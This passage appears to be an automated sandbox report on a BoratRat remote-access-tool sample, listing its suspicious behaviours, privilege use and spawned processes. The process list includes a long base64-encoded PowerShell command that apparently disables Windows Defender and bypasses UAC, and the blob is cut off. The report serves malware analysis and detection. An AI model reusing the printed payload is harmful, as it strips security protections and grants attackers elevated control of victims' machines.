Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\msinfo32.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: RenamesItself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Desktop\Borat\BoratRat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Desktop\Borat\Client.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\unregmp2.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\unregmp2.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Desktop\DECRYPT.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Processes
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Borat.rar
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\Borat\" -spe -an -ai#7zMap29299:68:7zEvent27585
C:\Users\Admin\Desktop\Borat\BoratRat.exe
"C:\Users\Admin\Desktop\Borat\BoratRat.exe"
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Users\Admin\Desktop\Borat\Client.exe
"C:\Users\Admin\Desktop\Borat\Client.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ACgBzAHAAIAAnAEgASwBDAFUAOgBcAFYAbwBsAGEAdABpAGwAZQAgAEUAbgB2AGkAcgBvAG4AbQBlAG4AdAAnACAAJwBUAG8AZwBnAGwAZQBEAGUAZgBlAG4AZABlAHIAJwAgAEAAJwAKAGkAZgAgACgAJAAoAHMAYwAuAGUAeABlACAAcQBjACAAdwBpAG4AZABlAGYAZQBuAGQAKQAgAC0AbABpAGsAZQAgACcAKgBUAE8ARwBHAEwARQAqACcAKQAgAHsAJABUAE8ARwBHAEwARQA9ADcAOwAkAEsARQBFAFAAPQA2ADsAJABBAD0AJwBFAG4AYQBiAGwAZQAnADsAJABTAD0AJwBPAEYARgAnAH0AZQBsAHMAZQB7ACQAVABPAEcARwBMAEUAPQA2ADsAJABLAEUARQBQAD0ANwA7ACQAQQA9ACcARABpAHMAYQBiAGwAZQAnADsAJABTAD0AJwBPAE4AJwB9AAoACgBpAGYAIAAoACQAZQBuAHYAOgAxACAALQBuAGUAIAA2ACAALQBhAG4AZAAgACQAZQBuAHYAOgAxACAALQBuAGUAIAA3ACkAIAB7ACAAJABlAG4AdgA6ADEAPQAkAFQATwBHAEcATABFACAAfQAKAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQAKAAoAJABuAG8AdABpAGYAPQAnAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAXABTAGUAdAB0AGkAbgBnAHMAXABXAGkAbgBkAG8AdwBzAC4AUwB5AHMAdABlAG0AVABvAGEAcwB0AC4AUwBlAGMAdQByAGkAdAB5AEEAbgBkAE0AYQBpAG4AdABlAG4AYQBuAGMAZQAnAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAACgBzAHAAIAAkAG4AbwB0AGkAZgAgAEUAbgBhAGIAbABlAGQAIAAwACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAAOwAgAGkAZgAgACgAJABUAE8ARwBHAEwARQAgAC0AZQBxACAANwApACAAewByAHAAIAAkAG4AbwB0AGkAZgAgAEUAbgBhAGIAbABlAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAB9AAoACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAAoAJABiAHAAYQBzAHMAPQAkAGIAYQBmAGYAbABpAG4AZwAuAEcAZQB0AFQAYQBzAGsAKAAnAFMAaQBsAGUAbgB0AEMAbABlAGEAbgB1AHAAJwApADsAIAAkAGYAbABhAHcAPQAkAGIAcABhAHMAcwAuAEQAZQBmAGkAbgBpAHQAaQBvAG4ACgAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ACgAKACQAcgA9AFsAYwBoAGEAcgBdADEAMwA7ACAAJABuAGYAbwA9AFsAYwBoAGEAcgBdADMAOQArACQAcgArACcAIAAoAFwAIAAgACAALwApACcAKwAkAHIAKwAnACgAIAAqACAALgAgACoAIAApACAAIABBACAAbABpAG0AaQB0AGUAZAAgAGEAYwBjAG8AdQBuAHQAIABwAHIAbwB0AGUAYwB0AHMAIAB5AG8AdQAgAGYAcgBvAG0AIABVAEEAQwAgAGUAeABwAGwAbwBpAHQAcwAnACsAJAByACsAJwAgACAAIAAgAGAAYABgACcAKwAkAHIAKwBbAGMAaABhAHIAXQAzADkACgAkAHMAYwByAGkAcAB0AD0AJwAtAG4AbwBwACAALQB3AGkAbgAgADEAIAAtAGMAIAAmACAAewByAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAA7ACQAQQB2AGUAWQBvAD0AJwArACQAbgBmAG8AKwAnADsAJABlAG4AdgA6ADEAPQAnACsAJABlAG4AdgA6ADEAOwAgACQAZQBuAHYAOgBfAF8AQwBPAE0AUABBAFQAXwBMAEEAWQBFAFIAPQAnAEkAbgBzAHQAYQBsAGwAZQByACcACgAkAHMAYwByAGkAcAB0ACsAPQAnADsAaQBlAHgAKAAoAGcAcAAgAFIAZQBnAGkAcwB0AHIAeQA6ADoASABLAEUAWQBfAFUAcwBlAHIAcwBcAFMALQAxAC0ANQAtADIAMQAqAFwAVgBvAGwAYQB0AGkAbABlACoAIABUAG8AZwBnAGwAZQBEAGUAZgBlAG4AZABlAHIAIAAtAGUAYQAgADAAKQBbADAAXQAuAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgApAH0AJwA7ACAAJABjAG0AZAA9ACcAcABvAHcAZQByAHMAaABlAGwAbAAgACcAKwAkAHMAYwByAGkAcAB0AAoACgBpAGYAIAAoACQAdQAgAC0AZQBxACAAMAApACAAewAKACAAIABzAHQAYQByAHQAIABwAG8AdwBlAHIAcwBoAGUAbABsACAALQBhAHIAZwBzACAAJABzAGMAcgBpAHAAdAAgAC0AdgBlAHIAYgAgAHIAdQBuAGEAcwAgAC0AdwBpAG4AIAAxADsAIABiAHIAZQBhAGsACgB9AAoAaQBmACAAKAAkAHUAIAAtAGUAcQAgADEAKQAgAHsACgAgACAAaQBmACAAKAAkAGYAbABhAHcALgBBAGMAdABpAG8AbgBzAC4ASQB0AGUAbQAoADEAKQAuAFAAYQB0AGgAIAAtAGkAbgBvAHQAbABpAGsAZQAgACcAKgB3AGkAbgBkAGkAcgAqACcAKQB7AHMAdABhAHIAdAAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGEAcgBnAHMAIAAkAHMAYwByAGkAcAB0ACAALQB2AGUAcgBiACAAcgB1AG4AYQBzACAALQB3AGkAbgAgADEAOwAgAGIAcgBlAGEAawB9AAoAIAAgAHMAcAAgAGgAawBjAHUAOgBcAGUAbgB2AGkAcgBvAG4AbQBlAG4AdAAgAHcAaQBuAGQAaQByACAAJAAoACcAcABvAHcAZQByAHMAaABlAGwAbAAgACcAKwAkAHMAYwByAGkAcAB0ACsAJwAgACMAJwApAAoAIAAgACQAegA9ACQAYgBwAGEAcwBzAC4AUgB1AG4ARQB4ACgAJABuAHUAbABsACwAMgAsADAALAAkAG4AdQBsAGwAKQA7ACAAJAB3AGEAaQB0AD0AMAA7ACAAdwBoAGkAbABlACgAJABiAHAAYQBzAHMALgBTAHQAYQB0AGUAIAAtAGcAdAAgADMAIAAtAGEAbgBkACAAJAB3AGEAaQB0ACAALQBsAHQAIAAxADcAKQB7AHMAbABlAGUAcAAgAC0AbQAgADEAMAAwADsAIAAkAHcAYQBpAHQAKwA9ADAALgAxAH0ACgAgACAAaQBmACgAZwBwACAAaABrAGMAdQA6AFwAZQBuAHYAaQByAG8AbgBtAGUAbgB0ACAAdwBpAG4AZABpAHIAIAAtAGUAYQAgADAAKQB7AHIAcAAgAGgAawBjAHUAOgBcAGUAbgB2AGkAcgBvAG4AbQBlAG4AdAAgAHcAaQBuAGQAaQByACAALQBlAGEAIAAwADsAcwB0AGEAcgB0ACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AYQByAGcAcwAgACQAcwBjAHIAaQBwAHQAIAAtAHYAZQByAGIAIAByAHUAbgBhAHMAIAAtAHcAaQBuACAAMQB9ADsAYgByAGUAYQBrAAoAfQAKAGkAZgAgACgAJAB1ACAALQBlAHEAIAAyACkAIAB7AAoAIAAgACQAQQA9AFsAQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuACIARABlAGYAYABpAG4AZQBEAHkAbgBhAG0AaQBjAEEAcwBzAGUAbQBiAGwAeQAiACgAMQAsADEAKQAuACIARABlAGYAYABpAG4AZQBEAHkAbgBhAG0AaQBjAE0AbwBkAHUAbABlACIAKAAxACkAOwAkAEQAPQBAACgAKQA7ADAALgAuADUAfAAlAHsAJABEACsAPQAkAEEALgAiAEQAZQBmAGAAaQBuAGUAVAB5AHAAZQAiACgAJwBBACcAKwAkAF8ALAAKACAAIAAxADEANwA5ADkAMQAzACwAWwBWAGEAbAB1AGUAVAB5AHAAZQBdACkAfQAgADsANAAsADUAfAAlAHsAJABEACsAPQAkAEQAWwAkAF8AXQAuACIATQBhAGsAYABlAEIAeQBSAGUAZgBUAHkAcABlACIAKAApAH0AIAA7ACQASQA9AFsASQBuAHQAMwAyAF0AOwAkAEoAPQAiAEkAbgB0AGAAUAB0AHIAIgA7ACQAUAA9ACQASQAuAG0AbwBkAHUAbABlAC4ARwBlAHQAVAB5AHAAZQAoACIAUwB5AHMAdABlAG0ALgAkAEoAIgApADsAIAAkAEYAPQBAACgAMAApAAoAIAAgACQARgArAD0AKAAkAFAALAAkAEkALAAkAFAAKQAsACgAJABJACwAJABJACwAJABJACwAJABJACwAJABQACwAJABEAFsAMQBdACkALAAoACQASQAsACQAUAAsACQAUAAsACQAUAAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsAFsASQBuAHQAMQA2AF0ALABbAEkAbgB0ADEANgBdACwAJABQACwAJABQACwAJABQACwAJABQACkALAAoACQARABbADMAXQAsACQAUAApACwAKAAkAFAALAAkAFAALAAkAEkALAAkAEkAKQAKACAAIAAkAFMAPQBbAFMAdAByAGkAbgBnAF0AOwAgACQAOQA9ACQARABbADAAXQAuACIARABlAGYAYABpAG4AZQBQAEkAbgB2AG8AawBlAE0AZQB0AGgAbwBkACIAKAAnAEMAcgBlAGEAdABlAFAAcgBvAGMAZQBzAHMAJwAsACIAawBlAHIAbgBlAGwAYAAzADIAIgAsADgAMgAxADQALAAxACwAJABJACwAQAAoACQAUwAsACQAUwAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQAUwAsACQARABbADYAXQAsACQARABbADcAXQApACwAMQAsADQAKQAKACAAIAAxAC4ALgA1AHwAJQB7ACQAawA9ACQAXwA7ACQAbgA9ADEAOwAkAEYAWwAkAF8AXQB8ACUAewAkADkAPQAkAEQAWwAkAGsAXQAuACIARABlAGYAYABpAG4AZQBGAGkAZQBsAGQAIgAoACcAZgAnACsAJABuACsAKwAsACQAXwAsADYAKQB9AH0AOwAkAFQAPQBAACgAKQA7ADAALgAuADUAfAAlAHsAJABUACsAPQAkAEQAWwAkAF8AXQAuACIAQwByAGAAZQBhAHQAZQBUAHkAcABlACIAKAApADsAJABaAD0AWwB1AGkAbgB0AHAAdAByAF0AOgA6AHMAaQB6AGUACgAgACAAbgB2ACAAKAAnAFQAJwArACQAXwApACgAWwBBAGMAdABpAHYAYQB0AG8AcgBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKAAkAFQAWwAkAF8AXQApACkAfQA7ACAAJABIAD0AJABJAC4AbQBvAGQAdQBsAGUALgBHAGUAdABUAHkAcABlACgAIgBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAGAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAYABzAGgAYQBsACIAKQA7AAoAIAAgACQAVwBQAD0AJABIAC4AIgBHAGUAdABgAE0AZQB0AGgAbwBkACIAKAAiAFcAcgBpAHQAZQAkAEoAIgAsAFsAdAB5AHAAZQBbAF0AXQAoACQASgAsACQASgApACkAOwAgACQASABHAD0AJABIAC4AIgBHAGUAdABgAE0AZQB0AGgAbwBkACIAKAAiAEEAbABsAG8AYwBIAGAARwBsAG8AYgBhAGwAIgAsAFsAdAB5AHAAZQBbAF0AXQAnAGkAbgB0ADMAMgAnACkAOwAgACQAdgA9ACQASABHAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFoAKQAKACAAIAAnAFQAcgB1AHMAdABlAGQASQBuAHMAdABhAGwAbABlAHIAJwAsACcAbABzAGEAcwBzACcAfAAlAHsAaQBmACgAIQAkAHAAbgApAHsAbgBlAHQAMQAgAHMAdABhAHIAdAAgACQAXwAgADIAPgAmADEAIAA+ACQAbgB1AGwAbAA7ACQAcABuAD0AWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AFAAcgBvAGMAZQBzAHMAZQBzAEIAeQBOAGEAbQBlACgAJABfACkAWwAwAF0AOwB9AH0ACgAgACAAJABXAFAALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsAEAAKAAkAHYALAAkAHAAbgAuAEgAYQBuAGQAbABlACkAKQA7ACAAJABTAFoAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAUwBpAHoAZQBPAGYAIgAsAFsAdAB5AHAAZQBbAF0AXQAnAHQAeQBwAGUAJwApADsAIAAkAFQAMQAuAGYAMQA9ADEAMwAxADAANwAyADsAIAAkAFQAMQAuAGYAMgA9ACQAWgA7ACAAJABUADEALgBmADMAPQAkAHYAOwAgACQAVAAyAC4AZgAxAD0AMQAKACAAIAAkAFQAMgAuAGYAMgA9ADEAOwAkAFQAMgAuAGYAMwA9ADEAOwAkAFQAMgAuAGYANAA9ADEAOwAkAFQAMgAuAGYANgA9ACQAVAAxADsAJABUADMALgBmADEAPQAkAFMAWgAuAGkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABUAFsANABdACkAOwAkAFQANAAuAGYAMQA9ACQAVAAzADsAJABUADQALgBmADIAPQAkAEgARwAuAGkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABTAFoALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAVABbADIAXQApACkACgAgACAAJABIAC4AIgBHAGUAdABgAE0AZQB0AGgAbwBkACIAKAAiAFMAdAByAHUAYwB0AHUAcgBlAFQAbwBgAFAAdAByACIALABbAHQAeQBwAGUAWwBdAF0AKAAkAEQAWwAyAF0ALAAkAEoALAAnAGIAbwBvAGwAZQBhAG4AJwApACkALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsAEAAKAAoACQAVAAyAC0AYQBzACAAJABEAFsAMgBdACkALAAkAFQANAAuAGYAMgAsACQAZgBhAGwAcwBlACkAKQA7ACQAdwBpAG4AZABvAHcAPQAwAHgAMABFADAAOAAwADYAMAAwAAoAIAAgACQAOQA9ACQAVABbADAAXQAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAJwBDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAQAAoACQAbgB1AGwAbAAsACQAYwBtAGQALAAwACwAMAAsADAALAAkAHcAaQBuAGQAbwB3ACwAMAAsACQAbgB1AGwAbAAsACgAJABUADQALQBhAHMAIAAkAEQAWwA0AF0AKQAsACgAJABUADUALQBhAHMAIAAkAEQAWwA1AF0AKQApACkAOwAgAGIAcgBlAGEAawAKAH0ACgAKACQAdwBkAHAAPQAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAnAAoAJwAgAFMAZQBjAHUAcgBpAHQAeQAgAEMAZQBuAHQAZQByAFwATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAnACwAJwBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAsACcAXABNAHAARQBuAGcAaQBuAGUAJwAsACcAXABTAHAAeQBuAGUAdAAnACwAJwBcAFIAZQBhAGwALQBUAGkAbQBlACAAUAByAG8AdABlAGMAdABpAG8AbgAnACAAfAAlACAAewBuAGkAIAAoACQAdwBkAHAAKwAkAF8AKQAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAfQAKAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAJwAgAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAGUAYQAgADAACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAgAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAF8AUwB1AHAAcAByAGUAcwBzACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAJwAgAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAGUAYQAgADAACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAgAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAF8AUwB1AHAAcAByAGUAcwBzACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABTAHkAcwB0AGUAbQAnACAARQBuAGEAYgBsAGUAUwBtAGEAcgB0AFMAYwByAGUAZQBuACAAMAAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAJwAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAJwAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAAoAbgBlAHQAMQAgAHMAdABvAHAAIAB3AGkAbgBkAGUAZgBlAG4AZAAKAHMAYwAuAGUAeABlACAAYwBvAG4AZgBpAGcAIAB3AGkAbgBkAGUAZgBlAG4AZAAgAGQAZQBwAGUAbgBkAD0AIABSAHAAYwBTAHMALQBUAE8ARwBHAEwARQAKAGsAaQBsAGwAIAAtAE4AYQBtAGUAIABNAHAAQwBtAGQAUgB1AG4AIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAAKAHMAdABhAHIAdAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACsAJwBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAHAAQwBtAGQAUgB1AG4ALgBlAHgAZQAnACkAIAAtAEEAcgBnACAAJwAtAEQAaQBzAG